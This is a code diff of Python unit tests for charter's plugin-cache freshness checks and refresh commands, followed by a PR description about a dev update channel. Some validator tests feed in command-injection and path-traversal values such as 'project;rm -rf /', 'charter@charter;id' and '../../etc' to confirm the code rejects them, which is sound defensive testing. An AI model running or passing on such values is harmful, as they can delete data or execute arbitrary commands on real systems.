+    def test_an_edited_skill_changes_the_hash(self):
+        """The case that actually happened: same version on both sides, different text."""
+        left, right = self._pair(extra_right={"skills/secrets/SKILL.md": "# secrets v2\n"})
+        self.assertNotEqual(plugincache.content_hash(left), plugincache.content_hash(right))
+
+    def test_an_added_file_changes_the_hash(self):
+        left, right = self._pair(extra_right={"skills/newthing/SKILL.md": "# new\n"})
+        self.assertNotEqual(plugincache.content_hash(left), plugincache.content_hash(right))
+
+    def test_a_renamed_file_changes_the_hash_even_with_identical_bytes(self):
+        """The path goes into the digest, not only the bytes. Without that, moving a skill
+        from one directory to another — which changes which skill the model loads — would
+        hash identically to not having moved it, and this check would report a tree that
+        loads different instructions as being in step."""
+        left = tree(self.tmp / "a", PLUGIN)
+        moved = {k: v for k, v in PLUGIN.items() if k != "skills/secrets/SKILL.md"}
+        moved["skills/vault/SKILL.md"] = PLUGIN["skills/secrets/SKILL.md"]
+        right = tree(self.tmp / "b", moved)
+        self.assertNotEqual(plugincache.content_hash(left), plugincache.content_hash(right))
+
+    def test_a_deleted_file_changes_the_hash(self):
+        left, right = self._pair()
+        (right / "skills/browser/SKILL.md").unlink()
+        self.assertNotEqual(plugincache.content_hash(left), plugincache.content_hash(right))
+
+    def test_churn_outside_the_plugin_surface_is_not_staleness(self):
+        """charter's marketplace entry is ``"source": "./"`` — the whole repository is
+        copied into the cache, ``tests/`` and ``docs/`` and all. Hashing the copy wholesale
+        would report a test-file edit as a stale plugin, which is not a stricter check but
+        a noisier one: a row that warns about something benign trains people to scroll past
+        the row, which costs the case that matters."""
+        left, right = self._pair(extra_right={"tests/test_x.py": "assert True\n",
+                                              "docs/news/unreleased-x.md": "hi\n",
+                                              "README.md": "different\n",
+                                              "charter/cli.py": "print(1)\n"})
+        self.assertEqual(plugincache.content_hash(left), plugincache.content_hash(right))
+
+    def test_a_missing_tree_is_none_rather_than_an_empty_hash(self):
+        """"I could not look" must never render as "they match" — the same distinction
+        `hooks.dispatched_handlers` documents at length, and the whole reason `doctor`
+        reports WARN rather than a green tick when it cannot compare."""
+        self.assertIsNone(plugincache.content_hash(self.tmp / "nothing-here"))
+        self.assertIsNone(plugincache.content_hash(self.tmp / "installed" / "no" / "such"))
+
+    def test_the_hash_of_an_empty_surface_is_not_the_hash_of_a_populated_one(self):
+        empty = self.tmp / "empty"
+        empty.mkdir()
+        left, _ = self._pair()
+        self.assertNotEqual(plugincache.content_hash(empty), plugincache.content_hash(left))
+
+    def test_the_surface_names_every_plugin_directory_this_repo_actually_ships(self):
+        """The constant is a whitelist, so a directory missing from it is a category of
+        drift this module reports as clean. Asserted against the repo rather than against a
+        second hardcoded list — a plugin directory added to charter that nobody adds here
+        fails this, at the moment it is added."""
+        shipped = {name for name in (".claude-plugin", "hooks", "skills", "commands",
+                                     "agents")
+                   if (REPO / name).is_dir()}
+        self.assertTrue(shipped, "the repo ships no plugin directories at all?")
+        self.assertTrue(shipped <= set(plugincache.PLUGIN_SURFACE),
+                        f"not covered: {sorted(shipped - set(plugincache.PLUGIN_SURFACE))}")
+        self.assertIn("skills", shipped)
+
+    def test_the_repos_own_plugin_surface_hashes(self):
+        """End-to-end against the real tree: whatever else is true, this must produce a
+        digest for the checkout the suite is running in."""
+        self.assertIsNotNone(plugincache.content_hash(REPO))
+
+
+class DifferingNamesThePaths(PersonaIso):
+    """A doctor row that names `skills/secrets/SKILL.md` is the difference between a number
+    a reader distrusts and a fact they can go and look at."""
+
+    def test_it_names_an_edited_file(self):
+        left = tree(self.tmp / "a", PLUGIN)
+        right = tree(self.tmp / "b", {**PLUGIN, "skills/secrets/SKILL.md": "changed\n"})
+        self.assertEqual(plugincache.differing(left, right), ["skills/secrets/SKILL.md"])
+
+    def test_it_names_a_file_present_on_only_one_side(self):
+        left = tree(self.tmp / "a", PLUGIN)
+        right = tree(self.tmp / "b", {**PLUGIN, "skills/new/SKILL.md": "x\n"})
+        self.assertIn("skills/new/SKILL.md", plugincache.differing(left, right))
+
+    def test_identical_trees_name_nothing(self):
+        left = tree(self.tmp / "a", PLUGIN)
+        right = tree(self.tmp / "b", PLUGIN)
+        self.assertEqual(plugincache.differing(left, right), [])
+
+    def test_it_stops_at_the_limit_rather_than_listing_forty_five_files(self):
+        left = tree(self.tmp / "a", PLUGIN)
+        right = tree(self.tmp / "b", {**PLUGIN,
+                                      **{f"skills/s{i}/SKILL.md": "x\n" for i in range(20)}})
+        self.assertEqual(len(plugincache.differing(left, right)), 3)
+        self.assertEqual(len(plugincache.differing(left, right, limit=5)), 5)
+
+
+class TheRefreshCommandsAreConstants(unittest.TestCase):
+    """`claude plugin list --json` is a machine's own output rather than a committed file,
+    so this is a narrower hazard than `charter.toml`'s — but it is still input, and it still
+    reaches an argv."""
+
+    def test_the_three_steps_are_in_the_order_that_was_verified_to_work(self):
+        """Measured, not reasoned about. `install` alone against an already-installed plugin
+        answers *"already installed"* and leaves the cache untouched; without `marketplace
+        update` first, the reinstall faithfully re-copies the same stale content."""
+        argvs = plugincache.refresh_argvs("charter@charter", "project")
+        self.assertEqual([a[2] for a in argvs], ["marketplace", "uninstall", "install"])
+        self.assertEqual(argvs[0], ["claude", "plugin", "marketplace", "update", "charter"])
+        self.assertEqual(argvs[1], ["claude", "plugin", "uninstall", "charter@charter",
+                                    "--scope", "project", "-y"])
+        self.assertEqual(argvs[2], ["claude", "plugin", "install", "charter@charter",
+                                    "--scope", "project", "-y"])
+
+    def test_a_scope_charter_does_not_know_builds_nothing(self):
+        for scope in ("global", "", None, "project;rm -rf /", "--force", 1, ["project"]):
+            with self.subTest(scope=scope):
+                self.assertIsNone(plugincache.refresh_argvs("charter@charter", scope))
+
+    def test_a_plugin_id_charter_does_not_recognise_builds_nothing(self):
+        """`util.run` takes a list and never a shell string, so the shell is not the
+        exposure; the exposure is an element beginning with `-` that `claude` reads as a
+        FLAG rather than as the plugin to uninstall."""
+        for pid in ("--scope", "-y", "charter", "charter@", "@charter", "",
+                    "charter@charter extra", "charter@charter\nrm -rf /",
+                    "charter@charter;id", "a/b@c", None, 7, "charter@charter@charter"):
+            with self.subTest(pid=pid):
+                self.assertIsNone(plugincache.refresh_argvs(pid, "project"))
+
+    def test_every_element_of_every_step_is_free_of_shell_metacharacters(self):
+        argvs = plugincache.refresh_argvs("charter@charter", "user")
+        for argv in argvs:
+            for element in argv:
+                for ch in (";", "|", "&", "`", "$", "\n", " "):
+                    self.assertNotIn(ch, element)
+
+    def test_all_three_scopes_are_accepted(self):
+        for scope in ("user", "project", "local"):
+            self.assertIsNotNone(plugincache.refresh_argvs("charter@charter", scope))
+
+
+class ReadingTheInstalledPlugin(unittest.TestCase):
+    """Everything talks to `claude plugin … --json`, never to Claude Code's own files —
+    `~/.claude/plugins/*` is an internal charter does not own, and `bin/edm` bet on an
+    internal path and broke silently (#197)."""
+
+    def _rows(self, rows):
+        return mock.patch.object(plugincache, "_claude_json", return_value=rows)
+
+    def test_the_charter_entry_is_found_among_others(self):
+        rows = [{"id": "figma@official", "scope": "user", "installPath": "/x"},
+                {"id": "charter@charter", "scope": "project", "installPath": "/y",
+                 "projectPath": "/p"}]
+        with self._rows(rows), mock.patch.object(plugincache, "available",
+                                                 return_value=True):
+            got = plugincache.installed_charter_plugin()
+        self.assertEqual(got["id"], "charter@charter")
+
+    def test_an_entry_charter_would_not_act_on_is_not_returned_at_all(self):
+        """Validated where it is read, so no caller has to remember to check — the same
+        placement argument `instance._HOTKEY_RE` makes for the config boundary."""
+        for row in ({"id": "charter@charter", "scope": "root", "installPath": "/y"},
+                    {"id": "-charter@charter", "scope": "user", "installPath": "/y"},
+                    {"id": "charter@charter x", "scope": "user", "installPath": "/y"},
+                    {"id": 7, "scope": "user"},
+                    "not-a-dict"):
+            with self.subTest(row=row):
+                with self._rows([row]), mock.patch.object(plugincache, "available",
+                                                          return_value=True):
+                    self.assertIsNone(plugincache.installed_charter_plugin())
+
+    def test_a_plugin_that_is_not_charter_is_not_charters_to_reinstall(self):
+        rows = [{"id": "charterly@charter", "scope": "user", "installPath": "/y"}]
+        with self._rows(rows), mock.patch.object(plugincache, "available",
+                                                 return_value=True):
+            self.assertIsNone(plugincache.installed_charter_plugin())
+
+    def test_the_entry_for_the_plane_you_are_standing_in_wins(self):
+        """Every project-scoped install points at the SAME versioned cache directory, so
+        which one is chosen does not change the outcome — it changes which project's
+        `claude plugin` invocation performs it, and the plane you are standing in is the
+        least surprising choice."""
+        rows = [{"id": "charter@charter", "scope": "project", "installPath": "/y",
+                 "projectPath": "/elsewhere"},
+                {"id": "charter@charter", "scope": "project", "installPath": "/y",
+                 "projectPath": "/here"}]
+        with self._rows(rows), mock.patch.object(plugincache, "available",
+                                                 return_value=True):
+            got = plugincache.installed_charter_plugin("/here")
+        self.assertEqual(got["projectPath"], "/here")
+
+    def test_a_failed_list_is_none_rather_than_nothing_installed(self):
+        with self._rows(None), mock.patch.object(plugincache, "available",
+                                                 return_value=True):
+            self.assertIsNone(plugincache.installed_charter_plugin())
+
+    def test_a_marketplace_name_charter_would_not_build_a_path_from_is_refused(self):
+        for name in ("../../etc", "char ter", "-x", "", None, 7, "a/b"):
+            with self.subTest(name=name):
+                with mock.patch.object(plugincache, "_claude_json") as looked:
+                    self.assertIsNone(plugincache.marketplace_clone(name))
+                looked.assert_not_called()
+
+    def test_force_refresh_declines_cleanly_with_no_claude_on_path(self):
+        """charter supports opencode and Codex; a plane on either has no plugin cache. This
+        must be a plain "nothing to do", not an error and not a claim of success."""
+        with mock.patch.object(plugincache, "available", return_value=False):
+            ok, detail = plugincache.force_refresh()
+        self.assertFalse(ok)
+        self.assertIn("claude", detail)
+
+    def test_force_refresh_declines_when_no_charter_plugin_is_installed(self):
+        with mock.patch.object(plugincache, "available", return_value=True), \
+                self._rows([]):
+            ok, detail = plugincache.force_refresh()
+        self.assertFalse(ok)
+        self.assertIn("no charter plugin is installed", detail)
+
+    def test_force_refresh_stops_at_the_first_failing_step_and_names_it(self):
+        rows = [{"id": "charter@charter", "scope": "user", "installPath": "/y"}]
+        calls = []
+
+        def run(cmd, cwd=None, check=True, **kw):
+            calls.append(list(cmd))
+            code = 1 if "uninstall" in cmd else 0
+            return mock.Mock(returncode=code, stdout="", stderr="boom")
+
+        with mock.patch.object(plugincache, "available", return_value=True), \
+                self._rows(rows), mock.patch.object(plugincache.util, "run", run):
+            ok, detail = plugincache.force_refresh()
+        self.assertFalse(ok)
+        self.assertIn("uninstall", detail)
+        self.assertEqual(len(calls), 2, "it must not go on to install after a failure")
+
+    def test_force_refresh_runs_all_three_steps_on_success(self):
+        rows = [{"id": "charter@charter", "scope": "user", "installPath": "/y"}]
+        calls = []
+
+        def run(cmd, cwd=None, check=True, **kw):
+            calls.append(list(cmd))
+            return mock.Mock(returncode=0, stdout="", stderr="")
+
+        with mock.patch.object(plugincache, "available", return_value=True), \
+                self._rows(rows), mock.patch.object(plugincache.util, "run", run):
+            ok, _ = plugincache.force_refresh()
+        self.assertTrue(ok)
+        self.assertEqual([c[2] for c in calls], ["marketplace", "uninstall", "install"])
+
+
+class DoctorReportsFreshnessOnBothChannels(PersonaIso):
+    """The severity differs by channel, and that is not hedging.
+
+    The marketplace clone tracks ``main``, which Claude Code re-fetches on its own, so SOME
+    drift is the steady state for every stable plane from the day after a release onward.
+    A warning there would be a permanent yellow row whose only honest fix is "wait for the
+    next release" — the cry-wolf failure `doctor`'s own comments keep returning to. On dev
+    the plane asked to track ``main`` and its plugin is not, which is a real gap with a real
+    command that closes it.
+    """
+
+    def _check(self, installed, clone, channel="stable", version="0.51.0"):
+        entry = {"id": "charter@charter", "scope": "project", "version": version,
+                 "installPath": str(installed), "projectPath": str(self.tmp)}
+        with mock.patch.object(config, "UPDATE", {"channel": channel}), \
+                mock.patch.object(plugincache, "available", return_value=True), \
+                mock.patch.object(plugincache, "installed_charter_plugin",
+                                  return_value=entry), \
+                mock.patch.object(plugincache, "marketplace_clone",
+                                  return_value=Path(clone) if clone else None):
+            return doctor.check_plugin_freshness()
+
+    def test_matching_trees_are_green_on_both_channels(self):
+        left = tree(self.tmp / "a", PLUGIN)
+        right = tree(self.tmp / "b", PLUGIN)
+        for ch in ("stable", "dev"):
+            with self.subTest(channel=ch):
+                res = self._check(left, right, channel=ch)
+                self.assertEqual(res.status, doctor.OK)
+                self.assertIn("matches", res.detail)
+
+    def test_drift_on_the_dev_channel_is_a_warning_that_names_the_command(self):
+        left = tree(self.tmp / "a", PLUGIN)
+        right = tree(self.tmp / "b", {**PLUGIN, "skills/secrets/SKILL.md": "moved on\n"})
+        res = self._check(left, right, channel="dev")
+        self.assertEqual(res.status, doctor.WARN)
+        self.assertIn("skills/secrets/SKILL.md", res.detail)
+        self.assertIn("charter update", res.hint)
+
+    def test_drift_on_the_stable_channel_is_reported_in_detail_not_in_a_hint(self):
+        """`Result.render` drops the hint entirely at OK, so guidance written there would
+        be invisible while looking shipped — which is the failure ADR 0013 is about, and an
+        unusually poor place to commit it."""
+        left = tree(self.tmp / "a", PLUGIN)
+        right = tree(self.tmp / "b", {**PLUGIN, "skills/secrets/SKILL.md": "moved on\n"})
+        res = self._check(left, right, channel="stable")
+        self.assertEqual(res.status, doctor.OK)
+        self.assertIn("skills/secrets/SKILL.md", res.detail)
+        self.assertIn("claude plugin update", res.detail)
+        self.assertIn(res.detail, res.render())
+
+    def test_the_row_never_fails_and_so_never_blocks_a_session(self):
+        """`cmd_doctor` exits non-zero only on FAIL, and that exit code is what makes the
+        SessionStart preflight print. A plugin whose skills are a week old is not a reason
+        to shout at every session start on every plane."""
+        left = tree(self.tmp / "a", PLUGIN)
+        right = tree(self.tmp / "b", {**PLUGIN, "skills/secrets/SKILL.md": "x\n"})
+        for ch in ("stable", "dev"):
+            self.assertNotEqual(self._check(left, right, channel=ch).status, doctor.FAIL)
+
+    def test_a_marketplace_it_cannot_locate_is_not_checked_rather_than_green(self):
+        left = tree(self.tmp / "a", PLUGIN)
+        res = self._check(left, None, channel="dev")
+        self.assertEqual(res.status, doctor.WARN)
+        self.assertIn("not checked", res.detail)
+
+    def test_an_unreadable_install_path_is_not_checked_rather_than_green(self):
+        right = tree(self.tmp / "b", PLUGIN)
+        res = self._check(self.tmp / "gone", right, channel="stable")
+        self.assertEqual(res.status, doctor.WARN)
+        self.assertIn("not checked", res.detail)
+
+    def test_no_claude_on_path_is_a_plain_green_nothing_to_compare(self):
+        with mock.patch.object(plugincache, "available", return_value=False):
+            res = doctor.check_plugin_freshness()
+        self.assertEqual(res.status, doctor.OK)
+        self.assertIn("no `claude`", res.detail)
+
+    def test_no_charter_plugin_installed_is_a_plain_green(self):
+        """CLI-only is a supported install (`docs/install.md`), and a plane that never
+        installed the plugin must not be warned about the plugin's freshness forever."""
+        with mock.patch.object(plugincache, "available", return_value=True), \
+                mock.patch.object(plugincache, "installed_charter_plugin",
+                                  return_value=None):
+            res = doctor.check_plugin_freshness()
+        self.assertEqual(res.status, doctor.OK)
+        self.assertIn("not installed", res.detail)
+
+    def test_the_check_is_registered_so_doctor_actually_runs_it(self):
+        """A check nobody calls is a check that does not exist. `_checks` is private, so
+        this asks the public surface the SessionStart preflight uses."""
+        with mock.patch.object(plugincache, "available", return_value=False):
+            names = [r.name for r in doctor.run_all()]
+        self.assertIn("plugin files", names)
+
+    def test_it_does_not_replace_the_version_skew_row(self):
+        """Two different questions — 'is the plugin newer than the CLI' and 'is the plugin
+        the same files as the clone' — and losing either one loses a real guard."""
+        with mock.patch.object(plugincache, "available", return_value=False):
+            names = [r.name for r in doctor.run_all()]
+        self.assertIn("plugin", names)
+        self.assertIn("plugin files", names)
+
+
+if __name__ == "__main__":
+    unittest.main()

--- a/tests/test_plugin_freshness.py
+++ b/tests/test_plugin_freshness.py
@@ -30,7 +30,7 @@ import unittest
 from pathlib import Path
 from unittest import mock
 
-from charter import config, doctor, plugincache
+from charter import config, doctor, plugincache, util
 from tests._isolation import PersonaIso
 
 REPO = Path(__file__).resolve().parents[1]
@@ -43,6 +43,18 @@ def tree(root: Path, files: dict[str, str]) -> Path:
         p.write_text(body)
     return root
 
+
+#: Top-level directories this repo ships that a Claude Code plugin does NOT load.
+#:
+#: The other half of the classification `test_every_top_level_directory_is_classified`
+#: enforces. `.claude/` is here rather than in the surface on purpose: a plugin's agents
+#: live in `<plugin>/agents/`, and this repo's `.claude/agents/` is its OWN project
+#: configuration, which travels into the cache because the marketplace entry is
+#: `"source": "./"` and is not loaded as plugin content.
+_NOT_PLUGIN_SURFACE = {
+    ".git", ".github", ".claude", "charter", "docs", "tests", "personas", "workspaces",
+    "dist",
+}
 
 PLUGIN = {
     ".claude-plugin/plugin.json": '{"name": "charter", "version": "0.51.0"}',
@@ -113,18 +125,36 @@ class TheHashCoversWhatThePluginLoads(PersonaIso):
         left, _ = self._pair()
         self.assertNotEqual(plugincache.content_hash(empty), plugincache.content_hash(left))
 
-    def test_the_surface_names_every_plugin_directory_this_repo_actually_ships(self):
-        """The constant is a whitelist, so a directory missing from it is a category of
-        drift this module reports as clean. Asserted against the repo rather than against a
-        second hardcoded list — a plugin directory added to charter that nobody adds here
-        fails this, at the moment it is added."""
-        shipped = {name for name in (".claude-plugin", "hooks", "skills", "commands",
-                                     "agents")
-                   if (REPO / name).is_dir()}
-        self.assertTrue(shipped, "the repo ships no plugin directories at all?")
-        self.assertTrue(shipped <= set(plugincache.PLUGIN_SURFACE),
-                        f"not covered: {sorted(shipped - set(plugincache.PLUGIN_SURFACE))}")
-        self.assertIn("skills", shipped)
+    def test_every_top_level_directory_is_classified_one_way_or_the_other(self):
+        """The constant is a whitelist, so a plugin directory missing from it is a whole
+        category of drift this module reports as clean.
+
+        **Enumerated from the filesystem, and classified exhaustively.** The first version
+        of this test built its `shipped` set from a hardcoded literal identical to
+        `PLUGIN_SURFACE` and then asserted one was a subset of the other — true by
+        construction. It caught a *removal* from the constant and could not catch the
+        *addition* its own docstring claimed it caught.
+
+        This asks the repository what directories it has and requires every one of them to
+        be in exactly one of two lists. Add `mcp/` or `commands/` to charter tomorrow and
+        this fails until somebody decides which it is — which is the decision the check
+        needs made, and the only thing a test can usefully force.
+        """
+        tops = {p.name for p in REPO.iterdir()
+                if p.is_dir() and not p.name.startswith("__")}
+        unclassified = tops - set(plugincache.PLUGIN_SURFACE) - _NOT_PLUGIN_SURFACE
+        self.assertEqual(
+            unclassified, set(),
+            f"new top-level director{'y' if len(unclassified) == 1 else 'ies'} "
+            f"{sorted(unclassified)}: does a Claude Code plugin LOAD it? Add it to "
+            f"plugincache.PLUGIN_SURFACE, or to _NOT_PLUGIN_SURFACE in this file.")
+
+    def test_the_three_directories_the_plugin_loads_today_are_covered(self):
+        """The removal half, named concretely so the pair covers both directions."""
+        for name in (".claude-plugin", "hooks", "skills"):
+            with self.subTest(name=name):
+                self.assertTrue((REPO / name).is_dir(), f"{name}/ has moved")
+                self.assertIn(name, plugincache.PLUGIN_SURFACE)
 
     def test_the_repos_own_plugin_surface_hashes(self):
         """End-to-end against the real tree: whatever else is true, this must produce a
@@ -253,10 +283,75 @@ class ReadingTheInstalledPlugin(unittest.TestCase):
             got = plugincache.installed_charter_plugin("/here")
         self.assertEqual(got["projectPath"], "/here")
 
-    def test_a_failed_list_is_none_rather_than_nothing_installed(self):
-        with self._rows(None), mock.patch.object(plugincache, "available",
+    def test_a_list_that_could_not_be_read_is_unknown_and_not_nothing_installed(self):
+        """The distinction `_claude_json`'s docstring states as a rule and the caller used
+        to throw away one line later.
+
+        Both collapsed to `None`, and `doctor` renders `None` as a GREEN *"the charter
+        plugin is not installed here"* — so any `claude` too old to understand `--json`
+        got a tick over a plugin nobody had looked at, which is the population most likely
+        to be running a stale one. The previous version of this test asserted the collapse
+        rather than catching it.
+        """
+        for rows in (None, {}, "[]", 7):
+            with self.subTest(rows=rows):
+                with self._rows(rows), mock.patch.object(plugincache, "available",
+                                                         return_value=True):
+                    got = plugincache.installed_charter_plugin()
+                self.assertIs(got, plugincache.UNKNOWN)
+
+    def test_a_list_that_WAS_read_and_holds_no_charter_is_plainly_none(self):
+        """The other side of the same distinction: looked, and it is not installed. A
+        supported state (`docs/install.md` documents a CLI-only install), so it must NOT
+        report as unknown or the row warns forever on a plane with no plugin."""
+        with self._rows([]), mock.patch.object(plugincache, "available",
+                                               return_value=True):
+            self.assertIsNone(plugincache.installed_charter_plugin())
+
+    def test_the_reads_are_bounded_by_the_same_budget_every_other_check_uses(self):
+        """`doctor` runs as a SessionStart preflight with a 20s hook budget, and this check
+        makes two `claude plugin` reads. At 15s each that was 30s against 20s — and the
+        constant's own comment cited the 20s budget while exceeding it. Pinned to
+        `CHECK_TIMEOUT` rather than to a number, so the two cannot drift."""
+        self.assertEqual(plugincache.LIST_TIMEOUT, doctor.CHECK_TIMEOUT)
+
+    def test_a_claude_that_never_returns_does_not_take_the_preflight_down(self):
+        """`util.run` raises `ProcTimeout` regardless of `check=False`, and nothing caught
+        it: not `_claude_json`, not the check, and not `doctor._checks()` — an eager list
+        literal with no per-check guard. `hooks/hooks.json` renders a non-zero `charter
+        doctor` as "charter preflight failed - fix before working:" at EVERY SessionStart,
+        so a hanging `claude` printed zero rows and that line.
+
+        Demonstrated end to end before the fix: 27 rows on origin/main, zero rows and
+        EXIT=1 here.
+        """
+        with mock.patch.object(plugincache, "available", return_value=True), \
+                mock.patch.object(plugincache.util, "run",
+                                  side_effect=util.ProcTimeout(["claude"], 5)):
+            self.assertIsNone(plugincache._claude_json(["list"]))
+
+    def test_a_claude_removed_between_the_which_and_the_exec_is_not_a_crash(self):
+        """`shutil.which` in `available()` and the exec in `util.run` are two moments. A
+        `FileNotFoundError` from the gap reached the crash reporter the same way a timeout
+        did."""
+        with mock.patch.object(plugincache, "available", return_value=True), \
+                mock.patch.object(plugincache.util, "run",
+                                  side_effect=FileNotFoundError("claude")):
+            self.assertIsNone(plugincache._claude_json(["list"]))
+
+    def test_only_charters_own_marketplace_id_is_recognised(self):
+        """`charter@charter` exactly, not `charter@<anything>`.
+
+        `force_refresh` UNINSTALLS what this returns. A plugin called `charter` published
+        by somebody else's marketplace is not charter's to uninstall, and the id anyone who
+        followed `docs/install.md` has is this one — a marketplace registers under the name
+        its own `marketplace.json` declares.
+        """
+        rows = [{"id": "charter@someone-else", "scope": "user", "installPath": "/y"}]
+        with self._rows(rows), mock.patch.object(plugincache, "available",
                                                  return_value=True):
             self.assertIsNone(plugincache.installed_charter_plugin())
+        self.assertEqual(plugincache.PLUGIN_ID, "charter@charter")
 
     def test_a_marketplace_name_charter_would_not_build_a_path_from_is_refused(self):
         for name in ("../../etc", "char ter", "-x", "", None, 7, "a/b"):
@@ -309,6 +404,60 @@ class ReadingTheInstalledPlugin(unittest.TestCase):
             ok, _ = plugincache.force_refresh()
         self.assertTrue(ok)
         self.assertEqual([c[2] for c in calls], ["marketplace", "uninstall", "install"])
+
+    def test_a_failure_AFTER_the_uninstall_leads_with_what_the_operator_now_has(self):
+        """The one outcome that must not read as a generic command failure.
+
+        This is not rollback-capable: the uninstall is what makes the install do any work,
+        so a failure between them leaves the plugin GONE for that scope. By the time this
+        runs the CLI has already been replaced and the harness artifact already moved — the
+        operator is several steps into a successful update, and a line naming only the argv
+        that broke leaves them to work out on their own that a plugin went missing.
+        """
+        rows = [{"id": "charter@charter", "scope": "user", "installPath": "/y"}]
+
+        def run(cmd, cwd=None, check=True, **kw):
+            code = 1 if "install" in cmd and "uninstall" not in cmd else 0
+            return mock.Mock(returncode=code, stdout="", stderr="boom")
+
+        with mock.patch.object(plugincache, "available", return_value=True), \
+                self._rows(rows), mock.patch.object(plugincache.util, "run", run):
+            ok, detail = plugincache.force_refresh()
+        self.assertFalse(ok)
+        self.assertIn("UNINSTALLED", detail)
+        self.assertIn("claude plugin install charter@charter", detail)
+
+    def test_a_failure_BEFORE_the_uninstall_does_not_claim_anything_was_removed(self):
+        """The counterpart. Saying "the plugin is now uninstalled" when it is not would be
+        the same defect pointing the other way."""
+        rows = [{"id": "charter@charter", "scope": "user", "installPath": "/y"}]
+
+        def run(cmd, cwd=None, check=True, **kw):
+            code = 1 if "marketplace" in cmd else 0
+            return mock.Mock(returncode=code, stdout="", stderr="offline")
+
+        with mock.patch.object(plugincache, "available", return_value=True), \
+                self._rows(rows), mock.patch.object(plugincache.util, "run", run):
+            ok, detail = plugincache.force_refresh()
+        self.assertFalse(ok)
+        self.assertNotIn("UNINSTALLED", detail)
+        self.assertIn("marketplace", detail)
+
+    def test_force_refresh_will_not_uninstall_what_it_could_not_read(self):
+        """`UNKNOWN` must not fall through to the "nothing installed" branch, and above all
+        must not reach the uninstall: charter does not know what is there."""
+        calls = []
+
+        def run(cmd, **kw):
+            calls.append(list(cmd))
+            return mock.Mock(returncode=0, stdout="", stderr="")
+
+        with mock.patch.object(plugincache, "available", return_value=True), \
+                self._rows(None), mock.patch.object(plugincache.util, "run", run):
+            ok, detail = plugincache.force_refresh()
+        self.assertFalse(ok)
+        self.assertEqual(calls, [])
+        self.assertIn("could not read", detail)
 
 
 class DoctorReportsFreshnessOnBothChannels(PersonaIso):
@@ -388,6 +537,47 @@ class DoctorReportsFreshnessOnBothChannels(PersonaIso):
             res = doctor.check_plugin_freshness()
         self.assertEqual(res.status, doctor.OK)
         self.assertIn("no `claude`", res.detail)
+
+    def test_a_list_that_could_not_be_read_is_a_warning_not_a_tick(self):
+        """The row an older `claude` gets — one that does not understand `--json`, i.e. the
+        population most likely to be running a stale plugin. It used to render:
+
+            ✓  plugin files     the charter plugin is not installed here
+
+        which is the #171 defect exactly: "a check that silently does nothing is worse than
+        no check". The sibling branch three lines below it (marketplace not located) always
+        got this right, which is what made the inconsistency visible.
+        """
+        with mock.patch.object(plugincache, "available", return_value=True), \
+                mock.patch.object(plugincache, "installed_charter_plugin",
+                                  return_value=plugincache.UNKNOWN):
+            res = doctor.check_plugin_freshness()
+        self.assertEqual(res.status, doctor.WARN)
+        self.assertIn("not checked", res.detail)
+        self.assertEqual(res.hint, doctor._NOT_CHECKED_HINT)
+        # The REASON, not merely the status. Deleting the `is UNKNOWN` branch still yields
+        # a WARN — the sentinel falls through, `entry.get` raises on a bare object, and the
+        # row-level crash guard catches it — so a test that stopped at the status would
+        # accept "not checked ('object' object has no attribute 'get')" as though it were
+        # this branch working. That is a guard passing because a different guard caught it.
+        self.assertIn("claude plugin list", res.detail)
+
+    def test_a_raising_check_costs_one_row_and_not_the_whole_preflight(self):
+        """`doctor._checks()` is an eager list literal with no per-check guard, so one
+        raising check returns NO rows — and `hooks/hooks.json` renders a non-zero `charter
+        doctor` as "charter preflight failed - fix before working:" at every SessionStart.
+        `plugincache` returns rather than raises on every path it owns; this is the belt for
+        the paths it does not."""
+        with mock.patch.object(plugincache, "available",
+                               side_effect=RuntimeError("something unforeseen")):
+            res = doctor.check_plugin_freshness()
+        self.assertEqual(res.status, doctor.WARN)
+        self.assertIn("not checked", res.detail)
+        with mock.patch.object(plugincache, "available",
+                               side_effect=RuntimeError("something unforeseen")):
+            rows = doctor.run_all()
+        self.assertGreater(len(rows), 20, "one bad check must not empty the preflight")
+        self.assertIn("plugin files", [r.name for r in rows])
 
     def test_no_charter_plugin_installed_is_a_plain_green(self):
         """CLI-only is a supported install (`docs/install.md`), and a plane that never


### PR DESCRIPTION
Merging to `main` and having no way to try it is the problem. Releases are deliberate, joint events; testing should not require one.

## The channel

```toml
[update]
channel = "dev"     # "stable" (the default) | "dev"
```

Three things change on `dev`, and nothing else does:

| | `stable` | `dev` |
| --- | --- | --- |
| "newer" means | a higher version is on PyPI | `main`'s head commit is not the one installed |
| `charter update` installs | `charter-cp==<version>` | `git+https://github.com/diazoxide/charter@main` |
| the brand chip | `⬢ charter 0.51.0` | `⬢ charter 0.51.0 dev` |

**Dev builds are never published.** PyPI forbids local version identifiers, so real dev releases would burn `0.52.0.dev1`, `.dev2`, … permanently, at a rate of hundreds a month, irreversibly. And publishing on every merge means running the release workflow — which holds `id-token: write` beside unpinned third-party actions (#443) — on every merge. CI installs `git+…@main` on every push to `main` instead, with **no `id-token`** and only first-party actions.

**Adjacent to #443:** this PR also adds a workflow-level `permissions: contents: read` to `test.yml`, which had none. That narrows the **pre-existing** `test` job too — four matrix jobs that run the repository's own code were inheriting the repo default token permissions.

## Version identity (PEP 610)

```
charter 0.51.0+dev (main @ a1b2c3d)      # git install
charter 0.51.0                            # published install
```

A direct-URL install writes `direct_url.json` into the dist-info; an index install writes none — so its **absence** is the positive statement "this came from PyPI". Every degradation prints something rather than raising: no dist-info (a checkout), torn or non-JSON content, `vcs_info` with no `commit_id`, a non-git direct URL (`+local`). `--version` is a lazy argparse action so the dist-info read lands only on the path that asks, not on every hook and every render.

## Security

`channel` is a **closed set of two**, matched at the config boundary, and the matched *constant* is what is stored — never the object the committed file supplied. It is only ever compared; the repository URL and every installer argv are module constants. `charter.toml` is committed, and `[frame] hotkey` reached tmux config text where a newline achieved code execution at launch, while a committed `mcp.json` key currently injects YAML (#453). This would have been the third door, and the one that installs software.

A pin **and** the dev channel together are now refused rather than silently settled: a dev build carries the *same* version number, so `hooks._autosync_version_lock` would have reinstalled the published wheel over it at every session start, invisibly.

**No silent auto-install.** charter nudges; the operator runs `charter update`.

## The plugin — live on both channels

`claude plugin update charter@charter` compares **version strings**. The plugin's version moves once per release; the marketplace clone of `main` advances on its own. Measured on a real machine: installed cache and clone **45 files apart**, both saying `0.51.0`, `plugin update` correctly answering *already at the latest version*.

Hooks are unaffected — `hooks.json` invokes the `charter` on `PATH`. The **skills** are what go stale, and skills are text the model loads.

